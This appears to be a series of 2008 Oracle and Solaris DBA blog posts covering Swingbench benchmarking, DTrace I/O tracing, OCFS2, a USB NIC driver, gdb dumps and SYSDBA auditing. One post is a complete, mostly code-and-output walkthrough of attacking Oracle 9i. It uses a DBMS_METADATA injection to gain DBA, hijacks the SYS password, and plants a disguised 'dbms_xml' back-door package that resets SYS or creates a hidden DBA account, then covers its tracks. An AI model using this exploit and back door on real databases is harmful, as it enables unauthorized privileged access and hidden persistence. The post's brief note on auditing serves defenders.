One quick section on how we will be enabling direct I/O for testing purposes. The UFS file system (as does most file systems) supports mounting the file system options which enable processes to bypass the OS page cache. One way to enable direct I/O on a UFS file system is to mount the file system with the forcedirectio mount option as so:

# mount -o forcedirectio /dev/dsk/c2t1d0s1 /u02

Another method which is possible is setting the FILESYSTEMIO_OPTIONS=SETALL parameter within Oracle (available in 9i and later). As Glenn Fawcett states in this excellent post on direct I/O, the SETALL value passed to the FILESYSTEMIO_OPTIONS parameters sets all the options for a particular file system to enable direct I/O or async I/O. When this parameter is set as stated, Oracle will use an API to enable direct I/O when it opens database files.

Swingbench Installation and Configuration

Now that we’ve got the preliminaries out of the way, its time to get on to the main reason for this post. The Swingbench code is shipped in a zip file which can be downloaded from here. A prerequisite for running Swingbench is that a Java virtual machine needs to be present on the machine which you will be running Swingbench on.

After unzipping the Swingbench zip file, you will need to edit the swingbench.env file (if on a UNIX platform) found in the top-level swingbench directory. The following variables need to be modified according to your environment:

ORACLE_HOME
JAVA_HOME
SWINGHOME

If using the Oracle instance client software instead of a full RDBMS install on the machine you are running Swingbench, the CLASSPATH variable must also be modified from $ORACLE_HOME/jdbc/lib/ojdbc14.jar to $ORACLE_HOME/lib/ojdbc14.jar.

Installing Calling Circle

The Calling Circle is an open-source preconfigured benchmark which comes with Swingbench. The Order Entry benchmark also comes with Swingbench but for the purposes of this article, we will only discuss the Calling Circle benchmark.

The Calling Circle benchmark implements an example OLTP online telecommunications application. The goal of this application is to simulate a randomized workload of customer transactions and measure transaction throughput and response times. Approximately 97 % of the transactions cause at least one database update, with well over three quarters performing two or more updates. More information can be found in the Readme.txt file which comes with the Swingbench software.

The first step for installing Calling Circle is to create the Calling Circle schema (CC) in the database. This is achieved using the ccwizard executable found in the swingbench/bin directory .

$ ./ccwizard

Click Next on the welcome screen and you will then be presented with the screen shown on the below:

Choose the option to create the Calling Circle schema. In the next screen, enter the connection details of the database you will be creating the schema in. This will involve entering the host name, port number (if not using the default port of 1521 for your listener) and the database service name. Also, ensure that you choose the type IV Thin JDBC driver. Click Next when you have entered this information.

The next screen involves the schema details for the Calling Circle schema. Enter appropriate locations for the datafiles on your system. When finished entering information on this screen, click Next to continue. This will bring you to the Schema Sizing window as shown below:

Use the slider to select the schema size you wish to use. For this post, I chose to use a schema size with 2,023,019 customers which implies a tablespace of size 2.1GB for data and a tablespace of size 1.3GB for indexes. When finished choosing your schema size, click Next to continue. Click Finish on the next screen to complete the wizard and create the schema. A progress bar will appear as shown below

Creating the Input Data for Calling Circle

Before each run of the Calling Circle application it is necessary to create the input data for the benchmark to run. This is accomplished using the ccwizard program we used previously for creating the Calling Circle schema. Start up the ccwizard program again and click Next on the welcome screen. On the “Select Task” screen show previously, this time select to “Generate Data for Benchmark Run” and click Next.

In the “Schema Details” window which follows, enter the details of the schema which you created in the last section. Click Next once all the necessary information has been entered. You will then be presented with the “Benchmark Details” screen as shown below:

In this post, we will use 1000 transactions for each test as seen in the “Number of Transactions” dialog window above. Press Next to continue and you will be presented with the final screen. Click Finish to create the benchmark data.

Starting the Benchmark Test

Now that we have the Calling Circle schema created and the input data generated, we can start our tests. To start up Swingbench and ensure that it operates with the Calling Circle benchmark we can pass the sample Calling Circle configuration file (ccconfig.xml) which is supplied with Swingbench as a runtime parameter as so:

$ ./swingbench -c sample/ccconfig.xml

This will start up Swingbench with the sample configuration for the Calling Circle application but only a few settings need to be changed for is to use this configuration. All that needs to be changed is the connection settings for the host you have already setup the Calling Circle schema on. Change the connection settings as necessary for your environment.

The following screen shot show the Calling Circle application running in Swingbench:

We will be performing 1000 transactions during each test run as specified when we generated the sample data. The Swingbench configuration we will be using for every test we perform is as follows:

This workload is typical of an OLTP application with 40% reads and 60% writes. The number of users associated with the workload is 15. We will use this exact workload for every test we perform.

Results & Conclusion

The measurements from Swingbench which we will use for comparing the performance of a UFS file system when Oracle uses direct I/O versus buffered I/O are the following:

Transaction throughput (number of transactions per minute)
Average response time for each transaction type

We will perform a run of the benchmark 5 times for each configuration we want to compare and then present the average of the measurements below. So we will run the tests 5 times with buffered I/O and then 5 times with un-buffered I/O by setting the FILESYSTEMIO_OPTIONS parameter.

So the comparisons from these 2 measurements are as follows:

While these tests were not very conclusive or thorough, they do show how Swingbench can be used for generating database activity. The measurements which I compared are only some of the measurements which Swingbench reports when finished running a benchmark. Hopefully I will be able to play and post a bit more on the excellent Swingbench utility in the future.

OCFS2 Mount by Label Support

2008-11-25T00:00:00-08:00

While messing around with OCFS2 on my RHEL4 install, I discovered that if I created an OCFS2 filesystem with a label, I was unable to mount it by that label. I would encounter the following:

# mount -L "oradata" /ocfs2mount: no such partition found

I found this quite strange and did some investigation. The version of util-linux that was present on my system after a fresh RHEL 4 install was - util-linux-2.12a-16.EL4.6.

So I grabbed the latest version of util-linux from Red Hat and viola, I am now able to mount an OCFS2 filesystem by its label.

The current version of util-linux on my system is - util-linux-2.12a-16.EL4.20.

Observing Oracle I/O Access Patterns with DTrace

2008-11-25T00:00:00-08:00
In this post, I will use the seeks.d and iopattern DTrace scripts, which are available as part of the DTraceToolKit (This toolkit is an extremely useful collection of scripts created by Brendan Gregg), to view the I/O access patterns typical of Oracle. DTrace is able to capture data throughout the kernel and so the job of finding access patterns has been greatly simplified.
The system on which these examples are being run has redo logs on one disk, datafiles on another disk and the control file is on another disk.
To get system-wide access patterns, the iopattern script can be used. Sample output is as follows:
# ./iopattern %RAN %SEQ COUNT MIN MAX AVG KR KW 100 0 7 4096 8192 7606 4 48 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 100 0 6 8192 8192 8192 0 48 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 100 0 6 8192 8192 8192 0 48 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 100 0 6 8192 8192 8192 0 48 0 0 0 0 0 0 0 0
This output was generated on an idle system (0.04 load). You can see that the iopattern script provides the percentage of random and sequential I/O on the system. During this monitoring period while the system was idle, all the I/O was random. The iopattern script also provides the number and total size of the I/O operations performed during the sample period, and it provides the minimum, maximum, and average I/O sizes.
Now, look at the output generated from the iopattern script during a period of heavy database load:
# ./iopattern %RAN %SEQ COUNT MIN MAX AVG KR KW 92 8 69 4096 8192 6589 304 140 86 14 69 4096 8192 5995 228 176 82 18 67 4096 8192 5257 64 280 84 16 19 4096 8192 6036 40 72 77 23 22 4096 8192 4282 0 92 88 12 68 4096 1015808 21744 1120 324 97 3 67 4096 8192 7274 400 76 89 11 66 4096 8192 6392 276 136 90 10 71 4096 8192 6345 216 224 87 13 62 4096 8192 5879 184 172 90 10 10 4096 8192 6553 40 24 100 0 17 8192 8192 8192 88 48 87 13 33 4096 1048576 38353 1168 68 86 14 65 4096 8192 6049 236 148
As you can see from the above output, the majority of the I/O which occurs during this period is random. In my mind, this one indication that the type of I/O typical in an OLTP environment is random (as we would expect).
To get the I/O distribution for each disk, the seeks.d script can be used. This script measures the seek distance for disk events and generates a distribution plot. This script is based on the seeksize.d script provided with the DTraceToolKit and is available in the Solaris Internals volumes.
Sample output from the seeks.d script is show below:
# ./seeks.dTracing... Hit Ctrl-C to end.^C Tracing... Hit Ctrl-C to end. ^C cmdk0 value ------------- Distribution ------------- count -1 | 0 0 |@@@@@@@@@@@@@@@@@@@@@ 43 1 | 0 2 | 0 4 | 0 8 | 0 16 | 0 32 | 0 64 | 0 128 |@@@@@@@@@@@@@ 26 256 |@@@@@@ 12 512 | 0 sd1 value ------------- Distribution ------------- count 32768 | 0 65536 |@@@@@@@@@@@@@@@@@@@@ 1 131072 | 0 262144 | 0 524288 | 0 1048576 |@@@@@@@@@@@@@@@@@@@@ 1 2097152 | 0
This output was generated when the system was idle as before. This output summarizes the seeks performed by each disk on the system. The sd1 disk in the output above is the disk on which my Oracle datafiles reside. The value column in the output indicates the size of the seek that was performed in bytes. This indicates some random I/O on this disk since the length of the seeks are quite large. The disk on which the redo logs are located does not show up in the output above since no I/O is being generated on that disk (sd2). Now, it is interesting to look at the output generated from the seeks.d script during a period when the database is under a heavy load.
# ./seeks.d Tracing... Hit Ctrl-C to end. ^C cmdk0 value ------------- Distribution ------------- count -1 | 0 0 |@@@@@@@@@@@@@@@@@@@@@@@ 18 1 | 0 2 | 0 4 | 0 8 | 0 16 | 0 32 | 0 64 | 0 128 |@@@@@@@@@@@@@ 10 256 |@@@@@ 4 512 | 0 sd2 value ------------- Distribution ------------- count -1 | 0 0 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 430 1 | 0 2 | 0 4 | 0 8 |@@@@@@@@ 120 16 |@ 11 32 | 3 64 | 0 128 | 0 256 | 0 512 | 0 1024 | 0 2048 | 0 4096 | 0 8192 | 0 16384 | 0 32768 | 0 65536 | 6 131072 | 0 sd1 value ------------- Distribution ------------- count 512 | 0 1024 |@@@ 31 2048 | 5 4096 | 0 8192 | 0 16384 | 0 32768 | 0 65536 |@@ 23 131072 |@@@@@@@@ 92 262144 |@@@@@@@ 73 524288 |@ 6 1048576 | 4 2097152 |@ 14 4194304 |@@@ 29 8388608 |@@@@ 40 16777216 |@@@@@ 56 33554432 |@@@@@@ 65 67108864 | 0
This time the disk on which the redo logs are located shows up as there is activity occurring on it. You can see that most of this activity is sequential as most of the events incurred a zero length seek. This makes sense as the log writer background process (LGWR) writes the redo log files in a sequential manner. However, you can see that I/O on the disk which contains the Oracle datafiles is random as seen by the distributed seek lengths (up to the 33554432 to 67108864 bucket).
The above post did not really contain any new information but I thought it would be cool to show a tiny bit of the possibility that DTrace has. This is one of the coolest tools I have used in the last year and is one of the many reasons why I have become a huge Solaris fan!

Installing & Configuring a USB NIC on Solaris

2008-11-25T00:00:00-08:00

In this post, I will provide a very quick overview of how to install and configure a USB network interface on Solaris.
Obtaining the USB Driver
The driver for a generic USB network interface which should cover the majority of USB NIC devices can be downloaded from here.
Installing the USB Driver
After downloading the driver, uncompress the gunzipped file and extract the archive as the root user.
# gunzip upf-0.8.0.tar.gz ; tar xvf upf-0.8.0.tar
This will create a upf-0.8.0 directory in the current directory. Change to the upf-0.8.0 directory. Now we need to perform the following to install the driver:
# make install # ./adddrv.sh
After this has been completed, the driver has been installed but the system needs to be rebooted before we can use the new driver. Reboot the system using the following procedure:
# touch /reconfigure # shutdown -i 0 -g0 y
This will scan for new hardware on reboot. The new NIC device will show up as /dev/upf0
Configuring the NIC Device
Once the USB driver has been installed and the system has been rebooted correctly, the NIC device can be configured as follows. (In this example, we will just make up an IP address to use).
# ifconfig upf0 plumb # ifconfig upf0 192.168.2.111 netmask 255.255.255.0 upMaking Sure the NIC Device Starts on Boot
To ensure that the new NIC device starts automatically on boot, we need to create a /etc/hostname file for that interface containing either the IP address configured for that interface of if we placed the IP address in the /etc/inet/hosts file, then the hostname for that interface.

Installing a Back Door in Oracle 9i

2008-11-25T00:00:00-08:00
In this post, we will demonstrate a way an attacker could install a back door in a 9i Oracle database. The information on this post is based on information obtained from Pete Finnigin's website and the 2600 magazine. The version of the database we are using in this post is:
sys@ORA9R2> select * from v$version; BANNER ---------------------------------------------------------------- Oracle9i Enterprise Edition Release 9.2.0.4.0 PL/SQL Release 9.2.0.4.0 - Production CORE 9.2.0.3.0 Production TNS for Linux: Version 9.2.0.4.0 - Production NLSRTL Version 9.2.0.4.0 - Production

Creating the User
In this example, we will create a user that we will install the back door with. We will presume that either an attacker has already gained access to this account or that a legitimate user wishes to install a back door in our database (the so called inside threat). The user we will install the back door as is testUser. We will only grant CONNECT and RESOURCE to this user.
sys@ORA9R2> create user testUser identified by testUser; User created. sys@ORA9R2> grant connect, resource to testUser; Grant succeeded. sys@ORA9R2> connect testUser/testUser Connected. testuser@ORA9R2> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ -------- ------------ --- --- --- TESTUSER CONNECT NO YES NO TESTUSER RESOURCE NO YES NO testuser@ORA9R2>

Gaining DBA Privileges
Now we will use a known exploit in the 9i version of Oracle that will allow this user to obtain the DBA role. This exploit is described in the document 'Many Ways to Become DBA' by Pete Finnigan. This exploit invloves creating a function and then exploiting a known vulnerability in the DBMS_METADATA package.
testuser@ORA9R2> create or replace function testuser.hack return varchar2 2 authid current_user is 3 pragma autonomous_transaction; 4 begin 5 execute immediate 'grant dba to testUser'; 6 return ''; 7 end; 8 / Function created. testuser@ORA9R2> select sys.dbms_metadata.get_ddl('''||testuser.hack()||''','') 2 from dual; ERROR: ORA-31600: invalid input value '||testuser.hack()||' for parameter OBJECT_TYPE in function GET_DDL ORA-06512: at "SYS.DBMS_SYS_ERROR", line 105 ORA-06512: at "SYS.DBMS_METADATA_INT", line 1536 ORA-06512: at "SYS.DBMS_METADATA_INT", line 1900 ORA-06512: at "SYS.DBMS_METADATA_INT", line 3606 ORA-06512: at "SYS.DBMS_METADATA", line 504 ORA-06512: at "SYS.DBMS_METADATA", line 560 ORA-06512: at "SYS.DBMS_METADATA", line 1221 ORA-06512: at line 1 no rows selected testuser@ORA9R2> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ -------- ------------ --- --- --- TESTUSER CONNECT NO YES NO TESTUSER DBA NO YES NO TESTUSER RESOURCE NO YES NO testuser@ORA9R2>
As you can see from the output above, the attacker has now gained the DBA role. Now, the attacker can start working on installing the back door.
Creating and Installing the Back Door
Now, he/she can save what the encrypted form of the SYS user's password is before installing the back door.
testuser@ORA9R2> select username, password 2 from dba_users 3 where username = 'SYS' ; USERNAME PASSWORD -------- ------------------------------ SYS 43CA255A7916ECFE testuser@ORA9R2>
Now, the attacker wants to install the back door as the SYS user so he/she alters the password of the SYS user so they can connect as the SYS user. The attacker will then change this password back to the saved password once finished installing the back door.

testuser@ORA9R2> alter user sys identified by pass; User altered. testuser@ORA9R2> connect sys/pass as sysdba Connected. testuser@ORA9R>
Now the attacker is connected as the SYS user and starts on creating the back door. The attacker creates the back door like so:
testuser@ORA9R2> CREATE OR REPLACE PACKAGE dbms_xml AS 2 PROCEDURE parse (string IN VARCHAR2); 3 END dbms_xml; 4 / Package created. testuser@ORA9R2> CREATE OR REPLACE PACKAGE BODY dbms_xml AS PROCEDURE parse (string IN VARCHAR2) IS var1 VARCHAR2 (100); BEGIN IF string = 'unlock' THEN SELECT PASSWORD INTO var1 FROM dba_users WHERE username = 'SYS'; EXECUTE IMMEDIATE 'create table syspa1 (col1 varchar2(100))'; EXECUTE IMMEDIATE 'insert into syspa1 values ('''||var1||''')'; COMMIT; EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY padraig'; END IF; IF string = 'lock' THEN EXECUTE IMMEDIATE 'SELECT col1 FROM syspa1 WHERE ROWNUM=1' INTO var1; EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY VALUES '''||var1||''''; EXECUTE IMMEDIATE 'DROP TABLE syspa1'; END IF; IF string = 'make' THEN EXECUTE IMMEDIATE 'CREATE USER hill IDENTIFIED BY padraig'; EXECUTE IMMEDIATE 'GRANT DBA TO hill'; END IF; IF string = 'unmake' THEN EXECUTE IMMEDIATE 'DROP USER hill CASCADE'; END IF; END; END dbms_xml; / testuser@ORA9R2> CREATE PUBLIC SYNONYM dbms_xml FOR dbms_xml; Synonym created. testuser@ORA9R2> GRANT EXECUTE ON dbms_xml TO PUBLIC; Grant succeeded. testuser@ORA9R2>
This package does the following (examples will be shown below):

It can unlock the SYS account by changing the password to a known password (in this case 'padraig').

Then, it can revert the SYS account's password back to the original password.

It can create a new user account with a known password that has the DBA role which can later be dropped from the database.

The attacker has now created a back door that can be very difficult to discover. The attacker has chosen a name for the package that looks like it was installed with the Oracle database. Now, the attacker changes the SYS user's password back to its original value to prevent the DBA from noticing that the SYS account has been hijacked. The attacker will also revoke the DBA role from his/her user account to prevent detection. This role is no longer need by the attacker since he/her has installed the back door.

testuser@ORA9R2> alter user sys identified by values '43CA255A7916ECFE'; User altered. testuser@ORA9R2> revoke dba from testUser; Revoke succeeded. testuser@ORA9R2> disconnect Disconnected from Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production With the Partitioning, OLAP and Oracle Data Mining options JServer Release 9.2.0.4.0 - Production testuser@ORA9R2> connect testUser/testUser Connected. testuser@ORA9R2> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS -------- ------------ --- --- --- TESTUSER CONNECT NO YES NO TESTUSER RESOURCE NO YES NO
In this first example, the attacker is going to use his/her back door to unlock the SYS account and connect as the SYS user.
testuser@ORA9R2> execute dbms_xml.parse('unlock'); PL/SQL procedure successfully completed. testuser@ORA9R2> connect sys/padraig as sysdba Connected. testuser@ORA9R2> show user USER is "SYS" testuser@ORA9R2>
Now, the attacker is finished doing his/her work as the SYS user and will change the SYS password back to the original password by calling the back door again:
testuser@ORA9R2> execute dbms_xml.parse('lock'); PL/SQL procedure successfully completed. testuser@ORA9R2>

Conclusion
This post showed how an attacker could exploit a known vulnerability in Oracle 9i to obtain DBA privileges and install a back door in an Oracle database. Of course, a wary DBA could detect this by auditing the ALTER USER statement and checking SYS owned objects periodically.

Generating a System State Dump on HP-UX with gdb

2008-11-25T00:00:00-08:00
I have previously used the gdb (GNU Debugger) to generate oracle system state dumps on Linux systems by attaching to an Oracle process. The ability to do this has been well documented by Oracle on Metalink (Note 121779.1) and in other locations.
The problem with this is that it does not work on the HP-UX platform. I found this out at the wrong time when trying to generate a system state dump during a database hang!
Apparently, the Oracle executable needs to be re-linked on the HP-UX platform to enable the gdb debugger to generate system state dumps by attaching to an Oracle process.
You can see all the gory details in Metalink Note 273324.1. I posted it here as I thought it might prove useful for me to have this information somewhere should I forget it in the future...

Audting SYSDBA Users

2008-11-25T00:00:00-08:00
I recently came accross this feature in Oracle introduced in 9i where all operations performed by a user connecting as SYSDBA are logged to an OS file. I'm sure most DBA's are familiar with this feature already but I have only just been enlightened!
To enable this feature auditing must be enabled and the AUDIT_SYS_OPERATIONS parameter must be set to TRUE. For example:
sys@ORCLINS1> ALTER SYSTEM SET AUDIT_SYS_OPERATIONS = TRUE SCOPE=SPFILE;
FALSE is the default value for this parameter. Pretty obvious from the above statement but the database must be restarted for the parameter to take affect.
All the audit records are then written to an operating system. The location of this file is determined by the AUDIT_FILE_DEST parameter.
sys@ORCLINS1> show parameter AUDIT_FILE_DEST NAME TYPE VALUE >-------------- ------------------------------------------ audit_file_dest string /oracle/oracle/admin/orclpad/adump sys@ORCLINS1>
An audit file will be created for each session started by a user logging in as SYSDBA. The audit file will contain the process ID of the server session that Oracle started for the user in its file name.
Most people are probably already familiar with this handy feature but I like to have it documented for myself somewhere so I put it here!